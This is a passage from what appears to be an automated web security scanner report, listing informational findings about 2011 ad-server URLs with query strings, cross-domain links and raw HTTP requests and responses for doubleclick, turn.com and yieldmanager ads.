<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7b/0/0/%2a/m;238973988;0-0;0;61502811;3454-728/90;43429626/43447413/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://www.YourLexusDealer.com/"><img src="http://s0.2mdn.net/viewad/2549284/K1006_IS_MY11_LDA_PhotoGallery_728x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

14.20. http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6560.159469.AOD-INVITE/B5795406.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6560.159469.AOD-INVITE/B5795406.3;sz=300x250;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlOpTZqQ8JsCZUJsTIi_406.k2y_JELrFM4m80TCEC.V1WAFQk1bNw1Oed8i1SM8ee.RmPfWfTvNitOYjvKinJdh4yeQiqxZHFiB93NdQAMWVNW.H_rWG4A-&redirectURL=;ord=a5ae6592-0cb9-4d98-8ee9-22cae8bf6618?

The response contains the following links to other domains:

http://cdn.doubleverify.com/script395.js?agnc=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=69733377&advid=2977403&sid=1089807&adid=&btreg=245334907&btsvrreg=doubleclick
http://s1.2mdn.net/2977403/Yahoo_Homeroom_Texas_300x250.jpg
http://s1.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N6560.159469.AOD-INVITE/B5795406.3;sz=300x250;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlOpTZqQ8JsCZUJsTIi_406.k2y_JELrFM4m80TCEC.V1WAFQk1bNw1Oed8i1SM8ee.RmPfWfTvNitOYjvKinJdh4yeQiqxZHFiB93NdQAMWVNW.H_rWG4A-&redirectURL=;ord=a5ae6592-0cb9-4d98-8ee9-22cae8bf6618? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 07 Sep 2011 14:14:25 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 7676
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;">

<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
us.lrd.yahoo.com/_ylc%253DX3oDMTFqYWtpb2dqBHRtX2RtZWNoA0ltYWdlIEJhbm5lcgR0bV9sbmsDVTExNzIzNzUEdG1fbmV0A1lhaG9vIQ--/SIG%253D11nn3kthr/**http%25253A//yahoo.homepagesforhomerooms.com/%25253Fstate%253DTX"><img src="http://s1.2mdn.net/2977403/Yahoo_Homeroom_Texas_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script395.js?agnc=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=69733377&advid=2977403&sid=1089807&adid=&btreg=245334907&btsvrreg=doubleclick'></script>
...[SNIP]...

14.21. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25866106&ahcid=1035372&bimpd=vxqdUbZjUGf5Ik_DIz7goCzRe53IV3sO5oeJFodb5IHoPHWJEWfQmIUJBrqVNzCa8tj3Gqj_6wYSknewd3-P6r8wvAhJVp5vH1605NNaPKgnFrBoR92yBmezmxBjjiI88mCACACPZeBwi2kS06OtEhvoZOuiXFvSAax-u8a2o5xeILd9lRc2vvGsOnsF7Q7vKsBuUkA-8VlBJ0oDsVM-6sEOEpPlvNJ4qu-8Mx1t2OHdBqwwAdXREWLMGT_vHc77bKft1T3_KfOd7AfS9KxfcjkimlpUUMl9J8j8GQHRcxhPDqKaci5hjQS5AdN5SQGoeFW02jr1pV8usb5JyA3MyB7wjv3cFZAZZaRLiW9CcwARE_MRPsHbk0nbVkEQYjHhPouPPrpg3j9JsXsZB_7xxwUkG6qGqrOMUXdk0UkfWHVmHPEdjUZ5a-GTuqF9aZPKjqLUC6hb0wSj6wfYFJkIBaEYB1lznQd-h9XMsY-Tascgipiadl0TooyddgoFJ9QM0EPMhW6_dOGVce90D-wCwpm1tzW1797Z5q2I2gMcIMtP2swrszR321kqEYVzyCBNgCchPaU_67i3SPEJWYvjs-vdLLRIWoAUjFvSDWdBKA4o_3YAOhlWu2c-5wl6jhLEfyDGrRkOQ8Z6TtdA6EbrrTch4odOWWFwERUnTwqp4vfVy8MArEGUWHr-ciSi7n7AF8zZiHgud2qKM-n4WEn4U3NNLR0H6S0KRcBBWvOpCtQflFZ4NGzOzmUBDeotD7e47Aq15mxFFcawijChbZD9a_BctAg2pUGMy4jP01RFiqB5xaWQX5dPMi7KW55DXazF&acp=34DF183B07E82D56&rtbacid=415077e7f48abb45374a2d35bdd864fed04a8a56

The response contains the following link to another domain:

http://www.smokeybear.com/

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25866106&ahcid=1035372&bimpd=vxqdUbZjUGf5Ik_DIz7goCzRe53IV3sO5oeJFodb5IHoPHWJEWfQmIUJBrqVNzCa8tj3Gqj_6wYSknewd3-P6r8wvAhJVp5vH1605NNaPKgnFrBoR92yBmezmxBjjiI88mCACACPZeBwi2kS06OtEhvoZOuiXFvSAax-u8a2o5xeILd9lRc2vvGsOnsF7Q7vKsBuUkA-8VlBJ0oDsVM-6sEOEpPlvNJ4qu-8Mx1t2OHdBqwwAdXREWLMGT_vHc77bKft1T3_KfOd7AfS9KxfcjkimlpUUMl9J8j8GQHRcxhPDqKaci5hjQS5AdN5SQGoeFW02jr1pV8usb5JyA3MyB7wjv3cFZAZZaRLiW9CcwARE_MRPsHbk0nbVkEQYjHhPouPPrpg3j9JsXsZB_7xxwUkG6qGqrOMUXdk0UkfWHVmHPEdjUZ5a-GTuqF9aZPKjqLUC6hb0wSj6wfYFJkIBaEYB1lznQd-h9XMsY-Tascgipiadl0TooyddgoFJ9QM0EPMhW6_dOGVce90D-wCwpm1tzW1797Z5q2I2gMcIMtP2swrszR321kqEYVzyCBNgCchPaU_67i3SPEJWYvjs-vdLLRIWoAUjFvSDWdBKA4o_3YAOhlWu2c-5wl6jhLEfyDGrRkOQ8Z6TtdA6EbrrTch4odOWWFwERUnTwqp4vfVy8MArEGUWHr-ciSi7n7AF8zZiHgud2qKM-n4WEn4U3NNLR0H6S0KRcBBWvOpCtQflFZ4NGzOzmUBDeotD7e47Aq15mxFFcawijChbZD9a_BctAg2pUGMy4jP01RFiqB5xaWQX5dPMi7KW55DXazF&acp=34DF183B07E82D56&rtbacid=415077e7f48abb45374a2d35bdd864fed04a8a56 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=undefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15225; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Fri, 09 Sep 2011 14:15:40 GMT
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:40 GMT
Content-Length: 8507

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n    \n\n     \n        \n                \n        <a target="turn_ad_landing_page" href="http://www.smokeybear.com"><img border="0" src="http://img.turn.com/img/server/ads/ps/728x90.jpg">
...[SNIP]...

14.22. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?CY80ANBtDAAFUIkAAAAAABvfIgAAAAAAAgAIAAIAAAAAAP8AAAAECv9yGAAAAAAA9awPAAAAAABnti0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAqvHSTWKQ8j9xPQrXo3DzP6HTBjptoARAmpmZmZmZBUCh0wY6baAEQJqZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABP8pWz3WCwCky7VqPoER8p2P8LgmYiHMJbwA-5AAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-15.html%3Fcb%3D0.33166992268525064,Z%3D300x250%26_salt%3D1434180912%26anmember%3D514%26anprice%3D%26keyword%3Dsmh%2Fnews_other%26r%3D0%26rf%3Dhttp%253A%2F%2Fnews.smh.com.au%2Fbreaking-news-national%2Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html%26s%3D814544,c151e658-d95b-11e0-9465-78e7d15f7c8c

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3753.158901.DATAXU/B5319162.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1315404949?
http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2;sz=300x250;pc=[TPAS_ID];ord=1315404949?
http://ad.doubleclick.net/adj/N3753.158901.DATAXU/B5319162.2;abr=!ie;sz=300x250;pc=[TPAS_ID];ord=1315404949?
http://ad.doubleclick.net/jump/N3753.158901.DATAXU/B5319162.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1315404949?
http://cti.w55c.net/ct/cms-2-frame.html
http://i.w55c.net/a.gif?t=0&id=0RlCN4ZmQt0FXYalebQa&si=2995815&pcid=1027317&ei=RMX&ci=8998917&p=258&s=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F7856%2F12590%2F22893%2D15%2Ehtml%3Fcb%3D0%2E33166992268525064&reqid=1315404949&cat=32

Request

GET /iframe3?CY80ANBtDAAFUIkAAAAAABvfIgAAAAAAAgAIAAIAAAAAAP8AAAAECv9yGAAAAAAA9awPAAAAAABnti0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAqvHSTWKQ8j9xPQrXo3DzP6HTBjptoARAmpmZmZmZBUCh0wY6baAEQJqZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABP8pWz3WCwCky7VqPoER8p2P8LgmYiHMJbwA-5AAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-15.html%3Fcb%3D0.33166992268525064,Z%3D300x250%26_salt%3D1434180912%26anmember%3D514%26anprice%3D%26keyword%3Dsmh%2Fnews_other%26r%3D0%26rf%3Dhttp%253A%2F%2Fnews.smh.com.au%2Fbreaking-news-national%2Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html%26s%3D814544,c151e658-d95b-11e0-9465-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O; ih="b!!!!4!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!#=3rv_!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=Ajz6%%)0sI!!w[/N0FYb/Pi`Z; pv1="b!!!!)!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!!!!%!?5%!%5XA1![:Z-!#gyo!(_lN~~~~~~=3rv_~~"; liday1=<9:^PpR#?yN0FYb1z4.l; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0229.rm.sp2
Set-Cookie: ih="b!!!!8!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!0=3rw8!0,R>!!!!*=3rw>!1-bB!!!!#=3f:x!1[PX!!!!#=3rwA!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2re:!!!!#=3rw:!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A!4el>!!!!#=3rw>"; path=/; expires=Fri, 06-Sep-2013 14:15:49 GMT
Set-Cookie: vuday1=%)0sHN0FYbjj_=i; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246e13fd8ece14cc1e8977faa9a; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=FA=ErN0FYbp=X2q; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:15:49 GMT
Pragma: no-cache
Content-Length: 1331
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8998917);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N3753.158901.DATAXU/B5319162.2;sz=300x250;pc=[TPAS_ID];ord=1315404949?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3753.158901.DATAXU/B5319162.2;abr=!ie;sz=300x250;pc=[TPAS_ID];ord=1315404949?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N3753.158901.DATAXU/B5319162.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1315404949?">
<IMG SRC="http://ad.doubleclick.net/ad/N3753.158901.DATAXU/B5319162.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1315404949?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME>
<iframe width="0" height="0" border="0" frameborder="0" src="http://cti.w55c.net/ct/cms-2-frame.html" style="display:none;" ></iframe>
<img src="http://i.w55c.net/a.gif?t=0&id=0RlCN4ZmQt0FXYalebQa&si=2995815&pcid=1027317&ei=RMX&ci=8998917&p=258&s=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F7856%2F12590%2F22893%2D15%2Ehtml%3Fcb%3D0%2E33166992268525064&reqid=1315404949&cat=32"/></body>
...[SNIP]...

14.23. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68

The response contains the following link to another domain:

http://tags.mathtag.com/view/js/?strat=109185&cr=126413&supply=99&random=1315404918&rfr=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F7856%2F12590%2F22893%2D2%2Ehtml%3Fcb%3D0%2E5778487676288933&rfid=3444489&ymct=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGVjdlug0AMRX%2DIZZgFZoqiyiyNUAJpKhCCtzAgBRIKiaZZ%2DvVdoHmvH%2DxrX51ri7hcNAxbSDgE7yrRENcimFLS4FraGnJd1xYYU8Io1%2EyCI0g8FYB3yU4Z%2ENYqr1eT%2DukhQDFvFGALoX8R9%2DV8GTdwm6QPr93Mz97%2ERnCS178%2EEcB1om8t0t%2DCyHtkLSNWpodr0od0nW9ZkkcqTl%2DOsY9Y0iXtOpW0TOtDnBa3ss%2Ew5gHCQtP2So1PpjmMqu3bz6bWq7tx%2EqhaObyP56FrpDLk0Js70%2DHMNi3MBDIx5oLo2Nir%2EvgsqwUymONwyh3bsTH%2E9sgXI4xn%2Eg%3D%3D%2C

Request

Response

14.24. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?WaUDAJdVGQBlSG4AAAAAACayKAAAAAAAAwAAAAYAAAAAAP8AAAAECs3BEAAAAAAASFc1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADiGAUAAAAAAAIAAgAAAAAAAAAAAAAAAAB-LAKFeBhzPwAAAAAAAAAAfiwChXgYgz8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3KSeJ3GCwChDKG1dFwfrlZYQld3J6roMfB2J5AAAAAA==,,http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F,B%3D10%26S%3D14494094%26Z%3D728x90%26_salt%3D1640159214%26cb%3D1315404889357362%26i%3D334050%26r%3D0%26ycg%3D%26ypos%3DN%26yprop%3Dau%255fnews%26yrc%3D%26yyob%3D,c14ae4d4-d95b-11e0-acb6-78e7d161fe68

The response contains the following links to other domains:

http://ad.au.doubleclick.net/ad/N799.Yahoo1/B4631682.16;abr=!ie4;abr=!ie5;sz=728x90;ord=1315404940?
http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16;sz=728x90;dcopt=rcl;mtfIFrameRequest=false;click=http://ad.yieldmanager.com/clk?3,eAGljFFPgzAAhP8QpbSFgRIfCowGHVMcSNhboTCIHTXSyfbvzWTZH.Be7rtL7hDxu5qvasFrgeuua5DrI4Jtm7Se89AYlu.7rusQl9jeyih5EdFn8cGyQO6YTf8U8svLQpTOV6iW9OZdfR1OJFgvDd3FDbrhPy0aGC1uHwmlhwXHpADvURLcz1l63rJYbllmbcrM2ZaJTvNYpiHqK5zgTd7Y-1x8pnl13h8L.Hof0ifD6LX-eoSQn8yxnSfzwnulzEYdoe7buZ005BDAmUNkYWS5HobzIEXD9QR4zUehRlCrw0mDTn2Dsf0ZpIS.7fRq9Q==,;ord=1315404940?

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!$!.fA@!!!!#=3rw7!0,R>!!!!#=3rw6"; path=/; expires=Fri, 06-Sep-2013 14:15:40 GMT
Set-Cookie: vuday1=Ajz6%N0FYb/Ve)m; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
